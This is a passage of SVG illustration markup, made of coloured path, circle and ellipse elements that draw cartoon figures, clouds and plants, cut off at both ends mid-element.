d="M1210.9 311.8A65.4 65.4 0 001173 324a73.7 73.7 0 00-139.8 32.4 78.3 78.3 0 001.1 12.9c-32.9 15-64.1 40.2-87.4 72.8h264a65.2 65.2 0 000-130.3z">
</path>
<path fill="#707cff"
d="M1035.5 617.4a115.9 115.9 0 10-199-109.1 117.7 117.7 0 104.3 194.1 76 76 0 00137.2-.7 51 51 0 1057.5-84.3z">
</path>
</g>
<path fill="#6a77fc"
d="M990 243.1H579.4a3 3 0 01-2.3-5c24.6-29.4 61.4-30.9 101.2-23.2 22.4-86.3 123-85.3 157.3-32.2 36.6-28.2 159-31.3 160.2 54.5a5.8 5.8 0 01-5.8 5.9z"
data-name="Layer 25"></path>
<path fill="#6874f7"
d="M57.9 530.5c89.2-45.1 152.1-10.2 152.1-10.2 44.1-13.7 83-4.1 103 11.6 12.5 9.7-15.5 8-78.3 8H60.2a5 5 0 01-5-5 4.9 4.9 0 012.7-4.4z"
data-name="Layer 24"></path>
<path fill="#6874f7"
d="M1525.8 824.6a34.7 34.7 0 00-66.9-12.1 33.3 33.3 0 00-7.8-.9 36.3 36.3 0 00-27.8 13h102.5z"
data-name="Layer 23"></path>
<g data-name="Layer 22">
<path fill="#4452f2"
d="M284.3 406.3c-4.7-22.1-2.4-28.1-18-48.9-5-6.7-27.8-5.3-38-3.4-12.1 2.7-25.3 19.1-25.3 19.1 10.4 56.3 18.9 50.5 22.2 69s-.1 26.3 20.9 26.3 35.7-9 28.8-27.1c11.6-3.7 13.8-14.1 9.4-35zM126.5 328.4c-4.4 48 12 45.7 60.4 26.9z">
</path>
<path
d="M366.5 370.5l-43.2 32c2.3 1.3 3.6 1.4 6.1 0s8.2-8 10.6-9.8 9-5.5 12.4-7.4a55 55 0 0011.1-8.4c2.7-3 3.7-4 3-6.4z">
</path>
<path fill="#eb459f" d="M214.3 184.1a97.9 97.9 0 00-92.7 129.1l92.7 66.6a97.9 97.9 0 000-195.7z"></path>
<path fill="#0c1aad"
d="M242.3 291.3c-9.1-4-9.4-3.9-15.1-11.7s-12-11-19-11l15.4 60.7c18.6 2.7 28.7-7.9 30.1-17.2s-2.3-16.8-11.4-20.8z">
</path>
<path fill="#0c1aad"
d="M234.7 300.6c-3.3-9.7-11-20.5-19.2-28.4a26.7 26.7 0 01-8.2-22.4l1.6-14.2a42.6 42.6 0 00-19.1-40.7 43.5 43.5 0 00-9.7-4.7 42.2 42.2 0 00-16.7-2 42.7 42.7 0 00-39.5 42.6 48.9 48.9 0 00.3 5.4l.7 5.8 3.2 24.8a72.5 72.5 0 01-3.5 33.3 58 58 0 00-3 13.1l75.5 62.1a58.3 58.3 0 0037.6-74.7z">
</path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.201"
d="M197.1 375.3a58.3 58.3 0 0037.6-74.7c-3.3-9.7-11-20.5-19.2-28.4"></path>
<path fill="#0c1aad"
d="M213.4 305.8c5.2-11.4 7.9-10.4 19.6-9 9.3 1.1 21.9 18.2 9 29.5s-42.2 9.7-28.6-20.5z"></path>
<circle cx="176.4" cy="277.3" r="3"></circle>
<circle cx="194" cy="276" r="3"></circle>
<path fill="none" stroke="#fff" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.7"
d="M194 276c16.1 10 10.9 19.6 24.9 35.8"></path>
<path fill="#ffc619" d="M180.3 305.5c8.4-7.7 10.9-9.8 14.3-10.1s9.2-.5 9.2-.5l1.6 36.7-22.8 2.6z"></path>
<path
d="M223.5 290a3.3 3.3 0 00-3.4-4h-15.5a4.8 4.8 0 00-4.7 4l-5.2 32.9a3.4 3.4 0 003.5 4h15.5a5 5 0 004.7-4z">
</path>
<path d="M222.5 286.9L224.3 288.6 219.8 289.7 222.5 286.9z"></path>
<path fill="#ffc619" d="M232.2 306.9c-2.2-2.9-4.5-6.7-9.8-6.7v6.7z"></path>
<path fill="#fff"
d="M225.2 291.6a3.4 3.4 0 00-3.5-4h-15.5a5 5 0 00-4.7 4l-5.1 32.8a3.3 3.3 0 003.4 4h15.5a4.8 4.8 0 004.7-4z">
</path>
<path fill="#ffc619"
d="M221.9 304.8h6.3a4.9 4.9 0 014.9 4.8 4.9 4.9 0 01-4.9 5.1h-4.6a6.5 6.5 0 01-6.3-5c-.4-2.7 1.6-4.9 4.6-4.9z">
</path>
<path fill="#ffc619"
d="M220.8 314.4h4.4a4.9 4.9 0 014.8 5.8 4.8 4.8 0 01-4.8 4h-2.7a6.5 6.5 0 01-6.3-4.9c-.4-2.7 1.6-4.9 4.6-4.9z">
</path>
<path fill="#ffc619" d="M194 325.9H209.2V331.94H194z"></path>
<path fill="#ffc619"
d="M210.1 307.3h-9.5a2.3 2.3 0 01-2.2-1.4l-1.1-2.4-1.2-4.9-3.3 18.5h15.6a6.5 6.5 0 006.3-4.9c.4-2.7-1.6-4.9-4.6-4.9z">
</path>
<path fill="#ffc619" d="M208.1 317.1h-15.3l1.9 9.9h11.7c2.9 0 5.8-2.2 6.2-4.9s-1.5-5-4.5-5z"></path>
<path fill="#66bcff"
d="M320.7 362.9c-1.1-14.9-13.8-15.5-22.8-19.6s-20.1-13.6-31.3-19.7-20.2-4.4-37.1 3.4l24.2 36c12.1 4.2 15.2 10.1 22.3 17.9s15.5 9.8 23.6 7.2c5 6.3 6 7.8 11.9 4.8s15.8-9.3 17.7-17.7-2.4-9.4-8.5-12.3z">
</path>
<path fill="#45aaf7"
d="M313.1 388h-.1c-5.3-.6-7.8-3.2-11.6-7.2-.9-1.1-2-2.2-3.3-3.5-14.6-.9-21.3-7.7-25.1-12.7-1.7-2.4-4.7-4-7.6-5.7s-5.6-3.2-7.5-5.5a29.7 29.7 0 01-3.6-5.4c-1.5-2.6-2.6-4.5-4.5-4.7s-4.8 1.2-7.6 2.9a37.2 37.2 0 01-8 3.9.9.9 0 01-1.1-.6.8.8 0 01.6-1.1 34.9 34.9 0 007.5-3.7c3.1-1.9 5.8-3.5 8.8-3.2s4.2 2.8 5.8 5.6a57 57 0 003.4 5.2c1.7 2 4.4 3.5 7.1 5.1s6.2 3.5 8.2 6.1c3.8 5.2 10.1 11.3 24.1 12h.3l.3.2 3.5 3.7c3.6 3.9 5.8 6.2 10.5 6.7a.9.9 0 01.8 1 1.1 1.1 0 01-.9.9z">
</path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.201"
d="M250.4 340.3a83.6 83.6 0 00-1.5 18.6"></path>
<path fill="#8cd9ff"
d="M266.6 410.7c-11.4 13.1-22.5 11.5-27.5 11.6s-4.9-3.5-5.7-6.4-1.5-7.6-1.5-7.6c-12.7 1-15.2-7.3-16.3-14.9-.8-5.8-3.2-8.4-4.7-13.6a97.8 97.8 0 01-77.4-42.5l12.2-11.4 31.3 14.7c19-10 29.6-15.3 40.1-17.6s21.6.4 26.6 14.6 6 18.8 10 25.4l4.4 6.4c4.8 7.3 10.1 17.7 3.5 30.9a70.8 70.8 0 005 10.4z">
</path>
<path d="M158.1 362c-1.6-9.7 1.5-17.1 8.1-19.2l-18.5-9.3-11.7 7a96 96 0 0022.1 21.5z"></path>
<path fill="#66bcff"
d="M242.8 416.8V415c-2.5-.1-2.9-1.9-4.5-10.3l-.2-1.1h-.7c-5.7-.6-9.8-3.3-11.3-14.5a37.7 37.7 0 00-4.9-15 34 34 0 01-1.6-3.4c-.4-1.1-.9-2.1-1.3-3.1a22.2 22.2 0 01-2.7-12c.1-4.4-.5-6.6-2.1-7.6s-4.8-.3-9.8 2.1l-.7.3c-7.8 3.8-23.5 11.3-39.9 15l2.3 1.4c15.8-3.9 30.8-11.1 38.4-14.8l.7-.3c3.9-1.9 6.8-3 8.1-2.2s1.3 2.5 1.2 6a25.8 25.8 0 002.8 12.9c.5 1 .9 1.9 1.3 2.9a31.4 31.4 0 001.8 3.7c1.6 2.9 3.5 6.5 4.6 14.4 1.4 10.2 5 14.9 12.2 15.9 1.6 8.2 2.2 11.3 6.3 11.5z">
</path>
<path fill="#0c1aad"
d="M180.3 303.5c-4.3-2.9-7.4-2.2-12 .5-5.7-3.8-12.4-3.6-19.1-.2-4.9 2.4-16.9 7.8-22.9 10.5a2.1 2.1 0 01-2.9-2.2l2.8-17.2c-13.5 13.1-15.8 37.3-9.7 49.5s26.6 9.1 32.7 4.7 8.2-6 15.8-5.6 13.6.4 22.5-8.4l5.6-2.8c.9-12.9-2.1-21.6-12.8-28.8z">
</path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.201"
d="M180.3 303.5c-4.3-2.9-7.4-2.2-12 .5-5.7-3.8-12.4-3.6-19.1-.2-4.9 2.4-16.9 7.8-22.9 10.5M169.3 304.5c12.5 7.7 16.1 17.7 17.6 24.4">
</path>
<path fill="#fff"
d="M255.6 258.2h-17.1a.8.8 0 00-.8.7l-2.2 13.9a.8.8 0 001.3.8l19.3-13.9a.8.8 0 00-.5-1.5z"></path>
<path fill="#fff"
d="M294.9 262.9c10.4 0 20.3-8.4 21.9-18.7v-.5c1.7-10.2-5.6-18.7-16-18.7H243c-10.4 0-20.3 8.5-21.9 18.7v.5c-1.7 10.3 5.5 18.7 16 18.7z">
</path>
<path fill="#8cd9ff"
d="M240.3 251.8a9.5 9.5 0 009-7.7v-.2a6.4 6.4 0 00-6.6-7.7 9.4 9.4 0 00-9 7.7v.2a6.5 6.5 0 006.6 7.7z">
</path>
<path fill="#66bcff"
d="M267.7 251.8a9.6 9.6 0 009-7.7v-.2a6.5 6.5 0 00-6.6-7.7 9.4 9.4 0 00-9 7.7v.2a6.5 6.5 0 006.6 7.7z">
</path>
<path fill="#8cd9ff"
d="M295 251.8a9.4 9.4 0 009-7.7v-.2a6.5 6.5 0 00-6.6-7.7 9.4 9.4 0 00-9 7.7v.2a6.5 6.5 0 006.5 7.7z">
</path>
<path fill="#29cc7a"
d="M209.8 294.1a1.5 1.5 0 00-1.4-1.7H207a1.9 1.9 0 00-1.7 1.4l-.7 4.7a1.5 1.5 0 001.4 1.7h1.4a1.7 1.7 0 001.6-1.4z">
</path>
<path fill="#ffc619"
d="M184.6 270.7A16.5 16.5 0 01195 261c.2 0 .3-.2.2-.4-2.5-6.4-2-10.3-.2-15.4 0-.2-.1-.4-.3-.4-8.1-2.2-11.7-7.2-12.9-11.3a.4.4 0 00-.7 0c-2.7 7.3-7.3 8.2-11.4 8.3a.3.3 0 00-.3.5c4.8 7.1 2.7 13-.9 17.4a.3.3 0 00.2.6c8 .2 12.7 4.7 15.3 10.4a.3.3 0 00.6 0z">
</path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.201"
d="M208.1 317.1L200 317.1"></path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.201"
d="M222.4 314.7L226.9 314.7"></path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.201"
d="M181.4 233.3c2.7-8.3 1.8-13.6.6-16.5M194.1 245.2c5.5-.3 8.9-2.1 11.8-5.2M184.6 270.7a13 13 0 010 3.1M169.1 259.7c-4.7 4.4-12.5 4.9-18.1 4M169.7 241.8c-2.4-3.7-6.5-7.7-10-8.9M195.2 260.6a29.7 29.7 0 005.9 1.3">
</path>
<path fill="#c40655"
d="M178.7 247.8c3.5 8.8 6.5 7.9 7.5 5s1.7-6.6 4-6.6 2 3.8 0 9.7-6.1 7.8-10.7 3.6-5.2-9-5.7-12.3 2.9-4.5 4.9.6z">
</path>
<path fill="none" stroke="#fff" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.7"
d="M176.4 277.3c3.8 18.8-5 29.2-5.8 48.6"></path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.201"
d="M209.9 378.5a46.4 46.4 0 01-.8-34.9M206.1 360c-2.9-3.7-3.3-9.5-3.3-9.5"></path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.201"
d="M131.5 312L121.6 316.7"></path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.201"
d="M234.5 296.5L240.2 297.4"></path>
<path fill="#d11583"
d="M366.6 370.3a23.3 23.3 0 01-2.3 3.5c-4 5-13.5 11.4-18.7 14.2s-6.7 4-10.4 7.8-8.1 8.8-11.9 6.7-9.7-7.5-13.4-11.4a1.7 1.7 0 01-.4-1.7c1.4-5.8 6.7-14.5 15.2-19.9a1.9 1.9 0 011.8 0c5.7 3 9 3.5 13.3 2.8 6.4-.9 12.3-4.7 18.8-7.6s7.1.2 8 5.6z">
</path>
<path fill="#fa80ba"
d="M314.4 395.5a71.4 71.4 0 008.9 7c3.8 2.1 8.3-2.9 11.9-6.7s5.2-4.9 10.4-7.8 14.7-9.2 18.7-14.2a23.3 23.3 0 002.3-3.5c-.9-5.4-2.5-8-8-5.6s-8.4 4.3-12.6 5.9a7 7 0 00-4.3 5.9c-.1 1.5-.1 3.1-.1 4.9-7.7-.4-14.6 3-15.1 13 0 0-6.8-2.5-12.1 1.1z">
</path>
<path fill="#ffe75c"
d="M364.3 373.8a31.5 31.5 0 002.2-3.3 1.2 1.2 0 00.2-1 7.7 7.7 0 00-1.1-3c-.9 2.3-2.5 4.6-6.5 8.4-6.3 5.9-13.7 8.7-18.1 11a31 31 0 00-10.3 8.5 20.9 20.9 0 01-9 7.1l1.6 1c3.8 2.1 8.3-2.9 11.9-6.7s5.2-4.9 10.4-7.8 14.7-9.2 18.7-14.2z">
</path>
<path fill="#d11583"
d="M280.6 391.8c-7.3-.9-14.1 3.4-19.2 16.3-1.9-1.1-6.5-2-13.1.2s-8.6 5.3-9.5 7.8a6.1 6.1 0 000 4.2c.5 1.6 1.3 3.9 2.6 7.7 2 5.8 1.8 11.1 5.3 11.2l42.8-39.9s.5-6.3-8.9-7.5z">
</path>
<path fill="#fa80ba"
d="M280.6 391.8c-7.3-.9-14.1 3.4-19.2 16.3-.6 1.6-1.2 3.6-1.8 5.8-7.3.4-10.4 4-10.8 11.2 0 0-5.3-2.5-7.8 1.7.1.4.3.8.4 1.2 2 5.8 1.8 11.1 5.3 11.2l42.8-39.9s.5-6.3-8.9-7.5z">
</path>
<path fill="#ffe75c"
d="M289.1 397.3l-3.8-2.6c-6-.2-11 .3-15.6 7s-7.3 13.6-12.4 18.3c-7.3 6.9-13.6 10.2-14.2 14.6.7 2.7 1.5 4.5 3.6 4.6l42.8-39.9a6.5 6.5 0 00-.4-2z">
</path>
<path fill="#d11583"
d="M282.6 392.9l3.5.5a1.9 1.9 0 011.5.8c1.6 1.7 2.2 4.4 2.2 7l-12.4-.5c3.9-2.5 5-4.6 4.4-6.8a.7.7 0 01.8-1z">
</path>
<path
d="M246.9 439.2c12.1.7 17-3.7 21.5-9.7a36.5 36.5 0 016.7-6.9c6.6-5.1 11.7-10.1 14.7-17.4 3.8-9.2-9-10-15.8-2.8s-6.4 14.6-20.2 25.8c-9.4 7.7-10.5 10.8-6.9 11z">
</path>
<ellipse cx="244.3" cy="417.4" fill="#fff" rx="1.6" ry="2.5" transform="rotate(-2.3 243.27 418.52)">
</ellipse>
<path fill="#d11583"
d="M366.9 368.6a14.7 14.7 0 00-1.9-3.8.2.2 0 00-.4-.1h-.2a.4.4 0 00-.2.4c1 2.8 1.6 6 .4 8.2 2.9-2.9 2.3-4.2 2.3-4.7z">
</path>
<ellipse cx="317.8" cy="387" fill="#fff" rx="2.4" ry="3.6" transform="rotate(-18.1 318.119 387.354)">
</ellipse>
</g>
<g data-name="Layer 21">
<path fill="#4452f2"
d="M290.1 1034.3a76.2 76.2 0 01-75-62.7c-6-33.7-12-60.4-20.5-82.8l140-51.3c6.6 22.6 16.7 52.1 29.3 102 12.1 48.1-24.2 94.8-73.8 94.8z">
</path>
<path fill="#ffc619"
d="M488.9 731.9c-4.7-6-6.7-5-10.2-5 0-5.9-2.8-6.4-4.1-1.5s-2.1 7.2 1.1 11.9 7.5 11.6 9.4 19.8a135.9 135.9 0 00-13.4 4.4l7.8 18.1c13-5.8 20.6-10.8 21.4-21.2s-7.2-20.4-12-26.5z">
</path>
<path fill="#bde9ff"
d="M350.2 707.9c10.4.1 18.2.5 29.2 4a18.2 18.2 0 0112.8 17.5v40h-4l-2.1-3.3v-31.5a16.2 16.2 0 00-12.3-15.8 125.3 125.3 0 00-19.9-3.1l-5-7.7z">
</path>
<path
d="M397 747a7.7 7.7 0 017.7 7.7V795a7.7 7.7 0 01-7.7 7.7 9.7 9.7 0 01-9.7-9.7v-36.3a9.7 9.7 0 019.7-9.7z"
transform="rotate(-180 396 774.85)"></path>
<circle cx="271.2" cy="806.2" r="112.7" fill="#0c1aad"></circle>
<path fill="#039c78" d="M163.8 772a112.8 112.8 0 0049.5 130.9A80.9 80.9 0 00163.8 772z"></path>
<path fill="#fa94c4"
d="M179.8 785.6c-7.4-2.8-8.5-4.1-10.3-7.6s-2.8-2.8-6.5-3.3c-.3 1-.6 1.9-.8 2.9 14.8 9.7 18.9 30.7 18.9 30.7l6.2-2.9s0-17.1-7.5-19.8z">
</path>
<path fill="url(#linear-gradient)"
d="M160.3 826.5a112.7 112.7 0 00218.8 11.9L260.7 789c-26.8-7.4-73.4-10.1-100.4 37.5z"></path>
<path d="M347.9 887.4c-23.2 0-65.4 4.5-90.1-23.4 17.9 20.2 26.3 35.4 26.9 54a112.3 112.3 0 0063.1-29.3z">
</path>
<path fill="#fa80ba"
d="M175.8 806.2c13.9-13.7 53.3-23.4 85.4 0l12.4-13.1c-1-21.6-5.8-22.9-12.4-16s-8 .7-14.5-11-14.7-13.9-20.6-1.9-4.6 12.4-9.5 10.7-14-6.1-21.6-7.2-11.2 9.7-10.5 17.9-1.4 7.9-5.3 6.3-4.9 3.4-3.4 14.3z">
</path>
<path fill="none" stroke="#ff5cb4" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.289"
d="M234.4 790.9a113.1 113.1 0 00.7-30M192 772c5.8 12 6.8 18 6.8 18"></path>
<path fill="#2ad17d"
d="M498.5 806.2c3.4-11 4.4-11.2-18.2-10.3-20.8.8-47.1 1.6-71.2 3.4-1.2-14.6-5.9-20.4-11.2-28 2-24.1-2.4-47.5-26.3-53.2s-59.1-6.9-82.5 1.8-16.8 42.2-14.3 64.9c0 0-20.7 6.7-28.5 27.2-6.5 17.3-3.4 37.9 15.1 55.7 29.7 28.6 59.6 31.7 87.9 28.4 22-2.7 33.1-19.5 36.2-35.8 40.3 15.1 65.9-7.6 74.8-18.5 10.5-12.6 25.4-16.7 34.4-20.6s12.8-7.4 3.8-15z">
</path>
<path fill="#fa80ba"
d="M302 681.8c-8.5-.5-17.5 5.1-11.5 21.2-9.2-.9-18.4 4.2-11.9 19.3l42.3-14.4c-3.7-18.6-10.4-25.5-18.9-26.1z">
</path>
<rect width="37.4" height="66.89" x="262.7" y="741.4" rx="18.7"></rect>
<path fill="#fff"
d="M355.6 709.2v6c-17.6-2.3-39.4-2.5-57.3 1.9a16.4 16.4 0 00-12.3 15.8v34.8h-21.8v-36.2a22 22 0 0118.3-21.7c32.4-5.7 54.9-3.5 73.1-.6z">
</path>
<path fill="#bde9ff"
d="M321.9 706.3c-10.4 0-18.2.5-29.2 3.9a18.4 18.4 0 00-12.8 17.5v40h4l2.1-3.2v-31.6a16.4 16.4 0 0112.3-15.8 125.4 125.4 0 0119.9-3l5-7.8z">
</path>
<path fill="#039c78"
d="M416.6 804.3c-24.4 1.2-51.4 2.8-61.2 3.2s-15.6.7-17.3 5.4 11.7 5.4 28.6 6.5 55 .9 77 0a485.7 485.7 0 0048.6-4.1c10.3-1.5.5-8.3.5-8.3s3.9-6.2-1.7-6.9-74.5 4.2-74.5 4.2z">
</path>
<path fill="#fff"
d="M391.1 813.6c1-14.6 6.6-15.4 9-11.5a26.5 26.5 0 013.4 7.8 3.8 3.8 0 013.6 0 4.5 4.5 0 012.3 3.7zM357.8 812.3c3.5-10.1 10.7-8.2 15.7-5.9a7.9 7.9 0 014.9 6.9zM346.7 811.9c2.7-10.4 5.5-9.7 6.4-5.7s1.2 6.1 1.2 6.1z">
</path>
<path fill="#ffc619"
d="M488.2 808.6c-14.6 2.3-41.1 4.6-75.1 5-.9-8.4 1.7-15.7 12-23.7 4.5-3.5 4.1-6.1 3.7-8.4-1.3-8.3-4.5-16.6-9.3-27.3-7.3-16.5-8.2-30.1 3.9-37.5s26-3.2 35.3 10.5 29.8 43.8 29.5 81.4z">
</path>
<path fill="#ffae00" d="M447.4 734.6c9 8.5 12.4 7.5 14.4 7s.3-5.6-.8-7.9z"></path>
<path fill="#fff"
d="M468.2 811c5.9-11 9-14.1 12.6-12.9s3.3 11.1 3.3 11.1zM447.9 812.5c4.8-16.4 10.7-14.3 12.7-11.6s4 10.4 4 10.4zM432.7 746.5c.7 4.1-.7 7.5-2.8 8s-4.1-1.6-5.3-4.8-.8-8.4 1.4-9.8 5.8 1.6 6.7 6.6z">
</path>
<path fill="#ed5f00"
d="M447.4 734.6c-2.5-3.1-1.1-8.8 2-14s7.4-7 11-7 4.7 3.6.5 13.6c5.3-.9 7.7-.8 8.2 2.1s-3 5-10.9 6.3-9.4.7-10.8-1z">
</path>
<path fill="#ffc619" d="M478.5 726.3c1.4-3.8 3-4.2 3.8-3.8s.6 2.2-.2 5.8-4.9 1.5-3.6-2z"></path>
<path fill="#ffc619" d="M481.4 726.9c3.1-2.6 4.7-2.3 5.2-1.5s-.5 2.2-2.9 5-5.1-1.1-2.3-3.5z"></path>
<path fill="#fff"
d="M343 773.8c6.3.1 8.7-1 9.4-3.6s-3.5-8.1-12.1-8.7-14.4 3.4-15.7 8.6 1.5 4.1 7.4 3.8a82.1 82.1 0 0111-.1zM378.3 773.8c-5.2.1-7.1-1-7.7-3.6s2.8-8.1 9.8-8.7 11.8 3.4 12.8 8.6-1.3 4.1-6 3.8a53.7 53.7 0 00-8.9-.1z">
</path>
<path fill="#bde9ff"
d="M268.1 747h4.5a13.4 13.4 0 0113.4 13.4v28.9a13.4 13.4 0 01-13.4 13.4h-4.5a16.9 16.9 0 01-16.9-16.9v-21.9a16.9 16.9 0 0116.9-16.9z">
</path>
<path fill="#fff"
d="M267 747h12.9v42.8a12.9 12.9 0 01-12.9 12.9 15.8 15.8 0 01-15.8-15.8v-24.1A15.8 15.8 0 01267 747z">
</path>
<path fill="#fa80ba"
d="M362.2 739.8c-7.3 0-9.8-2-15-8.9s-11.5-17.5-28.8-16.9c-11.1-15.7-6.4-34.4 4.7-43.6s33.4-9.2 41.4 5.2c4.3 7.6 6 15.9 3.1 30.7 9.4-2.7 13 3.7 11.6 11.7s-8 21.8-17 21.8z">
</path>
<rect width="7.5" height="21.43" x="261.2" y="764.2" fill="#ff78b9" rx="3.7"></rect>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="3.204"
d="M382.1 765.7a8.1 8.1 0 015.2.9M338.4 765.8a17.4 17.4 0 017.4.8"></path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="6.866"
d="M351.8 750.9c-11.3-.3-17.4-.2-27.5 1.1M392.3 752.4c-6.8-1.6-11-1.8-18.6-1.8"></path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.289"
d="M490.2 808.3c-22.1 3.7-77.3 7.9-145.6 3.4"></path>
<path fill="#039c78"
d="M383 859.7c-6.2 8.5-14.9 16.4-31.1 19.7-24.2 4.8-36.8-18-38.6-36.9-.7-8.1-1-16.7 2.6-7.7 7 17 22.8 19.5 34.6 19.2s17.1.9 32.5 5.7z">
</path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.289"
d="M255.1 873.9c7.2 3.7 16.1 4 16.1 4M251.2 801.8a46.6 46.6 0 00-8 19.8"></path>
<ellipse cx="331" cy="831.8" fill="#03ab83" rx="5.7" ry="10.1" transform="rotate(-46.3 330.993 831.733)">
</ellipse>
<path fill="none" stroke="#eb459f" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.289"
d="M359.4 738.7c6.8-7.5 10.1-18.3 11.2-25.7M347.2 728.6c5.8-23.6 5.8-48.7-10.2-57.5"></path>
<ellipse cx="257" cy="830.6" fill="#57f287" rx="4.2" ry="6.8" transform="rotate(-9.2 258.721 834.545)">
</ellipse>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.289"
d="M333.2 811.7L338.3 804.9"></path>
<ellipse cx="428.3" cy="743.6" rx="1.9" ry="2.9" transform="rotate(-25.5 428.417 743.846)"></ellipse>
<path
d="M450.6 731.2a.4.4 0 01-.4-.4 17.1 17.1 0 012.7-7.4c2.5-3.8 4.4-5.1 6.1-5.5s3.1 0 3.1 1.5a31.5 31.5 0 01-2.2 8.5 23.1 23.1 0 015.7-.5c1.1.1 1.1.6.3 1s-5 2-15.3 2.8z">
</path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.289"
d="M442.1 791.4c1.1 9.7-7 21.7-7 21.7"></path>
<path fill="#fff"
d="M288.9 889.8l-.8-.6.8-.5c.9-.6 1.8-1.3 1.7-2.2s-1-1.5-1.9-1.9l-.9-.5a2.4 2.4 0 01.8-.6c.8-.7 1.6-1.4 1.5-2.3s-1.1-1.4-2.1-1.8l-.8-.4.6-.7c.8-.7 1.6-1.4 1.4-2.4s-1.2-1.3-2.1-1.7a2.4 2.4 0 01-.9-.3l.6-.7c.8-.7 1.5-1.5 1.3-2.4s-1.2-1.3-2.2-1.6a3 3 0 01-.8-.4l.6-.7c.7-.7 1.5-1.5 1.3-2.4s-1.3-1.2-2.2-1.6l-.9-.3.6-.7c.8-.7 1.5-1.5 1.3-2.4s-1.2-1.3-2.2-1.6l-.8-.4c.2-.2.4-.5.6-.6a3.1 3.1 0 001.4-2.4c-.2-.9-1.2-1.3-2.1-1.7l-.8-.4.7-.6c.7-.6 1.6-1.3 1.5-2.2s-1.1-1.4-2-1.9l-.7-.5.7-.5c.8-.5 1.7-1.1 1.7-2s-.8-1.5-1.6-2.1l-.7-.6.8-.3 1.1-.6a1.2 1.2 0 00.7-1.2 1.4 1.4 0 00-.8-1.2c-1.5-.7-1.5-2.3-1.2-8.6v-.3c.4-7-1.2-25.3-3.4-30.4a.9.9 0 00-1.2-.5 1 1 0 00-.5 1.2c1.9 4.4 3.7 22.2 3.3 29.6v.3c-.3 6-.4 8.5 1.4 9.9h-.1c-1 .4-2 .8-2.1 1.8s.7 1.6 1.6 2.2l.8.6-.8.6c-.9.6-1.8 1.2-1.8 2.1s1 1.5 2 2l.8.5-.7.6c-.8.7-1.7 1.4-1.5 2.3s1.1 1.4 2.1 1.8a3 3 0 01.8.4 1.7 1.7 0 01-.6.6c-.8.8-1.6 1.5-1.4 2.4s1.2 1.3 2.2 1.7l.9.3a4.6 4.6 0 01-.7.7c-.7.8-1.5 1.5-1.2 2.4s1.2 1.3 2.1 1.6l.9.4-.6.7c-.7.7-1.5 1.5-1.3 2.4s1.2 1.2 2.2 1.6l.9.3-.7.7c-.7.7-1.4 1.5-1.2 2.4s1.1 1.3 2.1 1.7l.8.3-.6.7c-.8.7-1.5 1.4-1.4 2.3s1.1 1.3 2.1 1.7l.8.4-.7.6c-.8.7-1.6 1.4-1.5 2.3s1 1.4 1.9 1.9l.8.4-.7.5c-.9.6-1.8 1.2-1.7 2.1s.8 1.5 1.7 2.1l.7.5-.8.5c-.9.4-1.8.9-1.9 1.8s.7 1.6 1.5 2.3l.6.6-.8.3c-.9.4-1.9.7-2.2 1.6s.5 1.7 1.1 2.4l.6.7-.8.2c-1 .2-2.1.4-2.4 1.2a2.6 2.6 0 00.7 2.6l.4.8h-.8c-1.1.1-2.1.1-2.6.9s-.1 1.7.3 2.6l.3.9h-.9c-1-.1-2-.2-2.6.4s-.4 1.7-.1 2.7a3.7 3.7 0 00.2.9l-.9-.2c-1-.2-2-.5-2.7.1s-.5 1.6-.4 2.6.1.7.1 1l-.8-.3c-1-.4-2-.8-2.8-.2a1.8 1.8 0 00-.5.7h5.9a5.7 5.7 0 00-.1-1.3c0-.3-.1-.7-.1-.9l1 .2c1 .2 2 .5 2.7-.2s.4-1.7.1-2.8a3.7 3.7 0 00-.2-.9h1c1.1.1 2.1.3 2.7-.5s.2-1.8-.2-2.8l-.4-.9h1c1.1-.1 2.1-.1 2.6-.9s-.1-1.8-.7-2.7l-.4-.9.9-.2c1-.2 2.1-.4 2.4-1.3s-.4-1.8-1.1-2.6l-.6-.7.9-.4c1-.3 2-.7 2.2-1.6s-.6-1.7-1.4-2.4l-.7-.6.8-.5c.9-.5 1.9-1 1.9-2s-.8-1.5-1.7-2.1z">
</path>
<path fill="none" stroke="#000" stroke-linecap="round" stroke-miterlimit="10" stroke-width="2.289"
d="M485.1 757.1L489.7 758.7"></path>
<path fill="#2ad17d"
d="M203.2 874.9c-4.4-2.1-10-1-18.2 3.9a129.1 129.1 0 009.6 10c-1.3 9.5-4.4 14.8-7.4 21.2s.1 10.8 5.4 11.6 8.1-1.1 12.1-7.3a33.7 33.7 0 004.9-13.8 55 55 0 00.6-8.8c0-9.1-2.3-14.5-7-16.8z">
</path>
<path fill="#2ad17d"
d="M209.1 887.4c6.5-.8 10.9-1.4 13.9 2.7s3 8.7 1.3 17.1-5.8 17-12.2 16.4-8.8-4.3-6.5-13.6a188.3 188.3 0 003.5-22.6z">
</path>
<path fill="#2ad17d"
d="M223 897.1c4.8-.1 10.6-.4 12.2 4.8s.2 12-3 17.4-7.5 6.6-10.7 4.7-3.3-3.5-.8-10.5 3.2-9.9 2.3-16.4z">
</path>
<path fill="#2ad17d"
